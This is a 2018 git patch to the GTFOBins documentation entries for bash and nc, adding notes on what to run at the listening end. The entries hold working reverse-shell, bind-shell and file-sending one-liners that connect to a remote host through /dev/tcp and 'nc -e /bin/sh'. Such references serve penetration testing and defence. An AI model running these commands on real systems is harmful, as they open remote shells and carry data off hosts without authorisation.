From fad84256244dae4f6749beb38143be081a9c5759 Mon Sep 17 00:00:00 2001
From: Emilio Pinna
Date: Tue, 22 May 2018 18:51:52 +0100
Subject: [PATCH] Add nc and bash other end commands

---
 _gtfobins/bash.md | 13 +++++++------
 _gtfobins/nc.md | 15 +++++++++------
 2 files changed, 16 insertions(+), 12 deletions(-)

diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md
index 9504070..9b25cbb 100644
--- a/_gtfobins/bash.md
+++ b/_gtfobins/bash.md
@@ -7,13 +7,13 @@ functions:
   suid-enabled:
     - code: ./bash -p
   upload:
-    - description: Send local file in the body of an HTTP POST request.
+    - description: Send local file in the body of an HTTP POST request. Run an HTTP service to collect the file from the other end.
       code: |
         RHOST=10.0.0.1
         RPORT=8000
         LFILE=file_to_send
         echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT
-    - description: Send local file using a TCP connection.
+    - description: Send local file using a TCP connection. Run `nc -l -p 8000 > "where_to_save"` to collect the file on the other end.
       code: |
         RHOST=10.0.0.1
         RPORT=8000
@@ -26,15 +26,16 @@ functions:
         RPORT=8000
         LFILE=file_to_get
         (echo -e "GET /$LFILE HTTP/0.9\r\n\r\n" 1>&3 & cat 0<&3) 3<>/dev/tcp/$RHOST/$RPORT | (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; do read i; done; cat) > $LFILE
-    - description: Fetch remote file using a TCP connection.
+    - description: Fetch remote file using a TCP connection. Run `nc -l -p 8000 < "file_to_send"` to send the file from the other end.
       code: |-
         RHOST=10.0.0.1
         RPORT=8000
         LFILE=file_to_get
-        bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1 > $LFILE
+        cat < /dev/tcp/$RHOST/$RPORT > $LFILE
   reverse-shell:
-    - code: |
-        RHOST=127.0.0.1
+    - description: Run `nc -l -p 8000` to receive the shell on the other end.
+      code: |
+        RHOST=10.0.0.1
         RPORT=8000
         exec 5<&-;exec 5<>/dev/tcp/$RHOST/$RPORT;while read line 0<&5; do $line 2>&5 >&5; done
 ---
diff --git a/_gtfobins/nc.md b/_gtfobins/nc.md
index e427a9e..59e2264 100644
--- a/_gtfobins/nc.md
+++ b/_gtfobins/nc.md
@@ -1,25 +1,28 @@
 ---
 functions:
   upload:
-    - description: Serve a file on a TCP port.
+    - description: |
+        Send a file to a TCP port. Run `nc -l -p 8000 > "where_to_save"` to collect the file on the other end.
       code: |
         RHOST=10.0.0.1
         RPORT=8000
         LFILE=file_to_send
         nc $RHOST $RPORT < "$LFILE"
   download:
-    - description: Fetch remote file from a remote TCP port.
+    - description: Fetch remote file from a remote TCP port. Run `nc 10.0.0.2 8000 < "file_to_send"` to send the file from the other end.
       code: |-
         LPORT=8000
-        LFILE=file_to_get
+        LFILE=where_to_save
         nc -l -p $LPORT > "$LFILE"
   reverse-shell:
-    - code: |
+    - description: Run `nc -l -p 8000` to receive the shell on the other end.
+      code: |
         RHOST=10.0.0.1
         RPORT=8000
         nc -e /bin/sh $RHOST $RPORT
   bind-shell:
-    - code: |
+    - description: Run `nc 10.0.0.2 8000` to connect to the shell on the other end.
+      code: |
         LPORT=8000
-        nc -lp $LPORT -e /bin/sh
+        nc -l -p $LPORT -e /bin/sh
 ---